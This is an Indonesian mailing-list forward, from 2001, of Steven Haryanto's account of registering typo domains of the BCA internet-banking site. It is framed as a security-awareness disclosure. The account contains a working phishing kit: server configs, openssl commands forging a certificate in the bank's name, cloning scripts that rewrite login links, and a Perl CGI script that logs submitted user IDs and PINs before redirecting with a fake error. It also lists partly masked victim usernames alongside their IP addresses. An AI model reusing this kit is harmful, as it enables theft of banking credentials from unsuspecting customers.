Website www.kilkbca.com dengan menu "persis sama" seperti www.klikbca.com, bisa mengambil username dan password anda. Jadi harap anda berhati-hati dalam mengetik alamat, kalau perlu save dulu ke bookmark/favourites sehingga tidak perlu mengetik lagi. Mungkin agak teknis, tetapi mudah-mudahan bisa menjadi perhatian kita semua. -------- MIKO -------- e-mail: [EMAIL PROTECTED] -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: 07 Juni 2001 01:11 Pengakuan Steven Haryanto (http://haryan.to) dari Haryanto Family tentang kilkbca.com Membeli Domain Plesetan ----------------------------- Siapa pun dapat membeli domain .com (asal punya uang tentunya). Harga domain .com, .net, .org saat ini sudah cukup murah ketimbang dulu, bahkan lebih murah dari .or.id dan .web.id. Dengan 8 USD atau kurang per domain, tiap orang bisa membuka situs dengan namanya sendiri di Internet. Apakah membuat situs plesetan itu ilegal? Dalam kasus ini saya berani berkata: tidak. Meski nama "KlikBCA" di-trademark misalnya, tapi belum ada hukum jelas yang mengatur soal penyalahgunaan nama domain, bahkan di US sekalipun (meski tentunya, perusahaan-perusahaan besar bisa saja menyewa pengacara terbaik untuk merebut domain yang dikehendakinya dari pihak yang lebih lemah). Dan dalam hal ini BCA secara fundamental lebih rentan terhadap typo site, karena dia menggunakan domain .com yang bisa dibeli siapa saja. bankbali.co.id atau bii.co.id lebih sulit ditiru, karena untuk memperoleh domain tingkat kedua .co.id tidak semudah menyodorkan kartu kredit. Dibutuhkan akte pendirian perusahaan dan birokrasi IDNIC lainnya. Hm, kadang-kadang birokrasi itu lebih secure ya? Hehehe. Ada dua macam typo site. Pertama, permainan huruf atau font agar jika ditulis (dalam huruf besar atau sebaliknya) terlintas sama di mata yang tidak teliti. Misalnya: PayPaI.com (lihat http://www.slashdot.org/articles/00/07/21/1343231.shtml), hotmaiI.com, atau sla5hdot.org. Memang agak-agak mustahil orang salah ketik 'slashdot' menjadi 'sla5hdot.org' (di keyboard huruf S dan angka 5 cukup berjauhan letaknya). Tujuan membuat situs tipo jenis ini adalah untuk menaruh link ini di email atau halaman web agar orang mengkliknya. Ini dilakukan oleh pembuat PayPaI.com misalnya, dengan mengirim email pancingan kepada para member PayPal (sebuah layanan pembayaran online) bahwa si penerima email mendapatkan sejumlah uang, harap mengklik link di bawah ini (ke paypai.com, bukan ke paypal.com). Jenis kedua adalah yang betul-betul formulasi typo. Kasus saya kali ini termasuk tipe kedua ini. Situs tipo jenis ini ditargetkan bagi orang yang salah ketik atau kurang tahu pasti bagaimana harus mengeja sebuah situs. Misalnya: pay-pal.com, micosoft.com, Netcsape.com, WebCrawle.com, Cicso.com, Gocities.com, wwwcompaq.com, roketmail.com, dsb. Silakan Anda whois kombinasi-kombinasi lainnya. Saya sendiri dulu pertama sekali menemukan situs semacam ini yaitu Yaho.com dan Infosek.com. Percaya atau tidak, nama-nama seperti ini banyak sekali jumlahnya, dan oleh beberapa perusahaan telah dikomersilkan untuk dijual kepada pihak ketiga. How "creative". Tapi memang logikanya betul. Anda dapat limpahan trafik gratis, dan yang buat saya kaget juga, ternyata memang banyak sekali yang masuk ke situs plesetan klikbca.com saya tersebut. Bisa dibayangkan berapa limpahan hit seharinya untuk situs-situs seperti Yahoo! atau Netscape. [Sebetulnya ada jenis ketiga seperti microshit.com, microshaft.com, but this is not exactly a typo site. :-)] Apa saja sih motif orang-orang membeli domain plesetan? Sejauh ini kemungkinan yang bisa saya pikirkan: Mencari traffic. Biasanya untuk memperoleh impresi banner atau komisi referer (Contoh: lihat pay-pal.com) Hanya iseng. Memang bermaksud kriiminal. (Kasus pay-pai.com) Membuat parodi atau lelucon. Mencuri traffic dari saingannya. Benci kepada pemilik situs yang diplesetkan. Bermaksud baik? Membeli domain-domain situs porno untuk diarahkan ke situs rohani? :-) Klik Apa? Waktu menentukan domain-domain mana yang ingin dibeli, saya mengetikkan "klikbca" secara cepat berulang-ulang, untuk melihat salah ketik mana yang paling sering terjadi (minimal oleh jari saya). Akhirnya saya menentukan pilihan pada kelima domain di bawah ini: WWWKLIKBCA.COM KILKBCA.COM CLIKBCA.COM KLICKBCA.COM KLIKBAC.COM KlikBCA dan ClickBCA dimiliki oleh BCA sendiri. Ada berbagai tipo lain di kepala saya (klIkbca.com, klik-bca.com, click-bca.com, dsb. Tapi uang saya terbatas, teman. :-) Mana yang paling banyak "dipilih" orang? Sejak 30 April lalu: # wc klickbca/access.log clikbca/access.log klikbac/access.log \ wwwklikbca/access.log kilkbca/access.log 1557 27643 208351 klickbca/access.log 917 16339 124826 clikbca/access.log 60 1061 8010 klikbac/access.log 700 12607 101376 wwwklikbca/access.log 582 10359 79801 kilkbca/access.log Kolom pertama adalah hits. https://ibank.kilkbca.com/ (tidak diperlihatkan di atas) memiliki log yang lebih besar, karena user secara rata-rata akan mengambil minimal tiga halaman di situ (akan dijelaskan sebentar lagi). Yang cukup mengejutkan saya, ternyata hanya dalam periode 48 jam sejak situs https ini saya aktifkan, telah terkumpul sekitar lebih dari 130 PIN hasil submit para user yang tersesat (hanya sekitar 120-an yang nampaknya dalam format yang sesuai). Saya tidak tahu persis berapa jumlah userid+PIN yang cocok karena tidak ada yang saya coba. Apa? Daftar PIN ini dipublish ke Internet? Maunya... :-) Tapi berikut sepuluh sampel nama yang saya ambil dari daftar tersebut, bulan/tahun lahir dan PIN saya tutupi tentunya. Apakah nama Anda ada di bawah ini? Waktu login (WIB) Username Login dari IP Mon Jun 4 09:07:40 2001 dewianggXXXX 202.152.6.196 Mon Jun 4 09:17:41 2001 wildansaXXXX 202.146.253.15 Mon Jun 4 15:06:27 2001 rennoshaXXXX 202.158.54.138 Mon Jun 4 16:31:39 2001 hendramuXXXX 61.5.117.38 Mon Jun 4 16:32:37 2001 SYARIFPEXXXX 61.5.124.42 Mon Jun 4 18:16:17 2001 rubiantoXXXX 202.154.2.23 Mon Jun 4 20:21:19 2001 faraturaXXXX 202.155.70.155 Mon Jun 4 21:16:38 2001 ennyimraXXXX 202.155.89.140 Mon Jun 4 21:40:50 2001 JUDISAPOXXXX 202.165.34.84 Mon Jun 4 22:52:17 2001 RUDYTECHXXXX 202.158.56.183 Berikut rincian step-by-step pelaksanaan tipuan sederhana (tapi efektif ;-) ini. Konfigurasi server Langkah pertama setelah membeli domain-domain tersebut adalah meng-host-nya. Yang perlu ditambahkan adalah entri DNS dan entri VirtualHost. Berikut contoh untuk domain kilkbca.com: <virtualhost 202.67.35.67:80> DocumentRoot /home/sloki/www/kilkbca/ibank ServerName ibank.kilkbca.com ServerAlias *.ibank.kilkbca.com ibank.klickbca.com ibank.klikbac.com ibank.clikbca.com ibank.wwwklikbca.com ErrorLog /var/log/sloki/apache/kilkbca/error.log-ibank CustomLog /var/log/sloki/apache/kilkbca/access.log-ibank combined User kilkbca Group kilkbca RLimitCPU 30 RLimitMem 20000000 </virtualhost> Artinya, jika seseorang kebetulan mengakses kilkbca.com (atau beberapa variasi lainnya seperti yang tercantum di direktif ServerAlias), maka si pengakses akan disuguhi file dari direktori /home/sloki/www/kilkbca/ibank. Ada apa di direktori tersebut? Akan dijelaskan di bawah. Berikut konfigurasi untuk situs SSL satu-satunya, yaitu https://ibank.kilkbca.com (karena nama ini yang saya rasa paling tidak kentara bedanya dengan https://ibank.klikbca.com/, apalagi jika tampil dalam huruf kecil dan font sans serif di baris status browser). Server MWN menggunakan OpenSSL dan mod_ssl. <virtualhost 202.67.35.69:443> SSLEngine on SSLCertificateFile /usr/local/sloki/apache/conf/ssl.crt/ibank.kilkbca.com.crt SSLCertificateKeyFile /usr/local/sloki/apache/conf/ssl.key/ibank.kilkbca.com.key SSLLogFile /var/log/sloki/apache/kilkbca/ssl.log-ibank DocumentRoot /home/sloki/www/kilkbca/ibank-secure ServerName ibank.kilkbca.com ServerAlias *.ibank.kilkbca.com ibank.klickbca.com ibank.klikbac.com ibank.clikbca.com ErrorLog /var/log/sloki/apache/kilkbca/error.log-ibank-secure CustomLog /var/log/sloki/apache/kilkbca/access.log-ibank-secure combined User kilkbca Group kilkbca RLimitCPU 30 RLimitMem 20000000 <files login.asp> sethandler cgi-script </files> <files main.asp> forcetype text/html </files> </virtualhost> KTP Palsu Khusus untuk situs SSL, kita perlu membuat sertifikat SSL. Begini caranya: Pertama, buat kunci private SSL yang tidak diencrypt: # cd /s/apache/conf/ssl.key # dd if=/dev/urandom of=RANDOM bs=1k count=1 # openssl genrsa -rand RANDOM -out ibank.kilkbca.com.key 1024 Siapkan file konfigurasi: # cat >/s/apache/conf/ssl.csr/ibank.kilkbca.com.conf RANDFILE=/s/apache/conf/ssl.key/RANDOM [ req ] default_bits = 1024 distinguished_name = req_distinguished_name attributes = req_attributes prompt = no [ req_distinguished_name ] C = ID ST = Jakarta L = Jakarta O = PT. Bank Central Asia OU = Divisi Sistem Informasi CN = ibank.kilkbca.com emailAddress = [EMAIL PROTECTED] [ req_attributes ] challengePassword = ****** Kedua, buat certificate signing request: # cd /s/apache/conf/ssl.csr # openssl req -new -key ../ssl.key/ibank.kilkbca.com.key \ -out ibank.kilkbca.com.csr -config ./ibank.kilkbca.com.conf Ketiga, barulah buat certificate-nya. # cd /s/apache/conf/ssl.crt # openssl x509 -req -days 365 -in ../ssl.csr/ibank.kilkbca.com.csr \ -signkey ../ssl.key/ibank.kilkbca.com.key -out ibank.kilkbca.com.crt Karena sertifikat ini tidak ditandatangani (secara digital) oleh Verisign atau Thawte, maka browser akan menampilkan peringatan bahwa perusahaan ibank.kilkbca.com tidak trusted. Kebanyakan pemakai bertindak Yes, Yes, Yes dan menerima sertifikat ini. Jadi, masuklah dia ke tempat yang kita inginkan untuk kita suguhi sesuatu... Si Bunglon Langkah berikutnya membuat tampilan situs-situs palsu ini agar sama dengan situs aslinya. Cara paling mudah? Kopi saja. Pemakai biasanya mengakses www.klikbca.com untuk disuguhi latest news, kurs terbaru, dan sebagainya. Di halaman ini terdapat tombol login menuju https://ibank.klikbca.com. Kita hanya perlu mengambil halaman depan ini dengan sebuah skrip shell pendek: #!/bin/sh cd /home/wwwklikbca/www PATH=/bin:/usr/bin:/usr/local/bin wget -O- -U'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)' \ http://www.klikbca.com/ >index.html perl -0777 -pi -e'$_="<base href=http://www.klikbca.com>\n$_"; s#https://ibank.klikbca.com#https://ibank.kilkbca.com#g' index.html Perintah perl di atas berfungsi untuk menambahkan tag <base href> di baris pertama file index.html yang telah kita ambil, agar link-link image, javascript, atau CSS merujuk ke www.klikbca.com (situs asli), bukan ke situs gadungan kita. Menghemat bandwidth sedikit. :-) Dan juga tentunya, untuk meneruskan ketersesatan user agar jika mengklik tombol Login, maka diarahkan ke https://ibank.kilkbca.com (situs gadungan) dan bukan yang seharusnya https://ibank.kilkbca.com. Penambahan file index.html ini dilakukan untuk semua situs http:// gadungan, dan saya update per jam (lewat crontab) agar lebih realistik. Berikutnya menduplikasi situs SSL https://ibank.klikbca.com. Untuk yang satu ini saya meminta bantuan program curl untuk mengambil url https. #!/bin/sh PATH=/bin:/usr/bin:/usr/local/bin cd /home/kilkbca/www/ibank-secure curl -A 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)' \ https://ibank.klikbca.com/main.asp >index.html cp index.html main.asp perl -0777 -pi -e's#(<img .*?src=")#$1https://ibank.klikbca.com/#ig;' \ index.html perl -0777 -pi -e'$_="<base href=https://ibank.klikbca.com>\n$_";' \ main.asp perl -0777 -pi -e's#(</body>)#$1\n<script language=javascript> alert("User ID / Password Anda Salah (Your User ID / Password is Wrong)") </script>#' main.asp Ini saya jalankan hanya sekali per hari saja. Apa yang dilakukan script kedua di atas? Prosedur login Internet Banking BCA adalah sebagai berikut: halaman home Internet Banking (/) adalah skrip ASP bernama main.asp. Di halaman ini terdapat form login dengan action ke file login.asp. Jika login berhasil, maka pengguna akan dilempar ke index2.asp dalam keadaan sudah logged in. Jika gagal, akan dikembalikan ke main.asp untuk kembali memasukkan login+PIN sambil disuguhi dulu sebuah window alert Javascript yang memperingatkan bahwa login/password si pemakai salah. Di situs gadungan ini, login.asp adalah sebuah skrip Perl/CGI pendek: #!/usr/bin/perl use CGI ':standard'; $log = '/home/kilkbca/pins.txt'; open F,">>$log"; print F "---START-OF-ENTRY---\n"; print F scalar localtime, "\n"; print F "\n"; print F join "", map { "$_=$ENV{$_}\n" } keys %ENV; print F "\n"; print F join "", map { "$_=".param($_)."\n" } param(); print F "\n"; close F; print "Content-Type: text/html\n\n"; print '<meta http-equiv=Refresh content="0;url=main.asp">'; Jadi, jika seseorang [salah] mengakses https://ibank.kilkbca.com, ia akan tetap disuguhi index.html (bukan main.asp dulu) yang persis seperti di situs aslinya. Setelah mengisi username dan PIN serta mengklik submit, skrip login.asp akan menerima informasi login pemakai, merekamnya ke file beserta beberapa informasi lainnya (jenis browser, IP, waktu, dsb.) Setelah itu (ini yang licik!) skrip CGI akan melempar user ke main.asp untuk memberi tahu bahwa loginnya salah (lihat skrip shell sebelumnya, di mana dengan perl kita menyisipkan sebaris perintah window.alert() ke main.asp kita). Pengguna mungkin terkejut karena login dan PIN yang ia yakin benar gagal membawanya masuk. Namun di kali yang kedua, form login di main.asp akan langsung menuju https://ibank.klikbca.com (situs asli). Jadi, jika terus tak sadar ia salah ketik, pengguna akan mengalami loginnya gagal satu kali, tapi kemudian berhasil lagi. Pada umumnya pengguna akan lalu melupakan kejanggalan ini. Yang tidak dia sadari adalah bahwa sebelum sampai ke tujuan sesungguhnya, ia sempat singgah dulu sesaat di situs gadungan dan sempat menyumbangkan login + PIN untuk kita. Mwahahahahaha. Bagaimana menghindari kemungkinan semacam ini? Dilema. Ada beribu kemungkinan salah ketik yang mungkin dilakukan orang (yang pernah melihat hasil rekaman submit form orang mungkin ngeri mengetahui kenyataan betapa banyaknya salah ketik yang bisa terjadi). Suatu hari, kita semua pasti pernah/akan melakukan kesalahan semacam ini. Dan jika ada orang yang kebetulan membeli nama domain yang sesuai dan kebetulan bermaksud jahat dan membuat duplikat, mungkin kena jugalah kita? Beberapa cara yang mungkin bisa memperkecil kemungkinan ini: Fasilitas di browser masa depan yang bisa memberi warning dan memperbaiki typo, berdasarkan situs-situs yang sebelumnya sering dikunjungi. Ada semacam ketentuan pelarangan pembelian typo domain. Atau, pembelian domain .com diperketat. Bagi pengguna, saya bisa berikan saran berikut: Selalu berhati-hati saat memasuki situs sensitif. Pastikan komputer tempat Anda mengakses itu trusted. Ini terutama berlaku bagi pengunjung warnet atau pekerja kantoran. Percaya atau tidak, yang harus lebih Anda curigai sebetulnya bukan saya orang yang ada di tempat yang jauh, melainkan network admin dan pengurus warnet tempat Anda berada. Siapa yang tahu komputer yang Anda pakai diberi keylogger (perekam hentakan tombol, jadi apapun yang Anda ketik terekam). Atau seseorang memasang null router, memberi ilusi pada Anda bahwa situs gadungan yang dibuatnya memiliki IP atau hostname sesuai aslinya. Buat BCA, saya bisa berikan saran berikut: Ganti klikbca.com dengan klikbca.co.id atau ibank.bca.co.id. Hindari domain .com! Belilah semua kombinasi plesetan lain klikbca.com yang lain. Well, may be not. :-) O ya, ada saran lain meski tidak berhubungan, dalam hal ini saya menyuarakan beberapa keluhan yang sering disuarakan oleh orang-orang semenjak Internet Banking BCA hadir. Ganti format username agar tidak predictable seperti sekarang ini (up to 8 karakter nama depan dan belakang + 2 digit bulan + 2 digit tahun). Contohlah Bank Bali misalnya. :-) Kunci utamanya sebetulnya di user sendiri. Semua sysadmin atau security expert tahu hal ini. Sebagus-bagusnya keamanan yang dirancang, jika usernya, maaf, bego, di situlah weak linknya. Ibaratnya begini, seseorang sudah membeli brankas yang paling kuat, mahal, antiledak, antilas untuk menyimpan uang berharga. Tapi kemudian terjadi kasus semacam ini: saat dia pergi seorang temannya menukar brankas tersebut dengan sebuah duplikat yang mirip sekali aslinya, lalu saat si empunya frustasi karena kombinasi brankasnya gagal terus, si temannya mencoba "membantu" dan memancing dengan pertanyaan-pertanyaan seperti berikut: "Kamu yakin sudah memasukkan kombinasi yang tepat? Coba saya perhatikan..." Atau, "Berapa sih sebetulnya nomor kombinasi ini?" Saya pun dengan ini minta maaf kepada pihak BCA. Sekali lagi tidak ada maksud saya mencuri uang dari rekening orang lain. Bahkan saya harapkan dengan apa yang saya telah buat ini para pemakai menjadi lebih sadar akan isu keamanan dan melihatnya dengan mata yang lebih luas. Ingat iklan Internet Banking Anda? "Pengamanan berlapis sepuluh. SSL 128 bit... Disertifikasi oleh Verisign... Firewall untuk membatasi akses... Userid dan PIN. Bla bla bla". Apakah kita harus menciptakan teknologi canggih, menyewa hacker jempolan, menjebol semua teknologi pengaman itu untuk memperoleh akses ke rekening pemakai? Tidak. Yang Anda butuhkan hanyalah 8 USD. :-) Buat yang mau mencoba menerobos ke server MWN untuk mencoba mencari file pins.txt, forget it. Semua log sudah saya wipe dari harddisk server, dan sejak pukul 01:12 dinihari tadi, sudah berhenti saya rekam (namun situs plesetan masih bisa aktif dan bisa dilihat). To unsubscribe from this group, send an email to: [EMAIL PROTECTED] Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ Keluarga Besar SMA 2 Padang di http://sma2pdg.rantaunet.com ================================================== Berlangganan/Berhenti menerima SMA 2 Padang Mailing List, kirimkan email To: [EMAIL PROTECTED] Subject: -dikosongkan- Isi email pada baris dan kolom pertama: mendaftar: subscribe SMA2-Padang email_anda berhenti: unsubscribe SMA2-Padang email_anda ------------------------------------------------------------------------------------------ WEB-EMAIL GRATIS [EMAIL PROTECTED] ---> http://mail.rantaunet.web.id ------------------------------------------------------------------------------------------ Kerjasama RantauNet.Com http://www.rantaunet.com dan server PT USINDO GLOBAL USAHA, Jakarta dan USINDO Group, San Fransisco, USA ==================================================
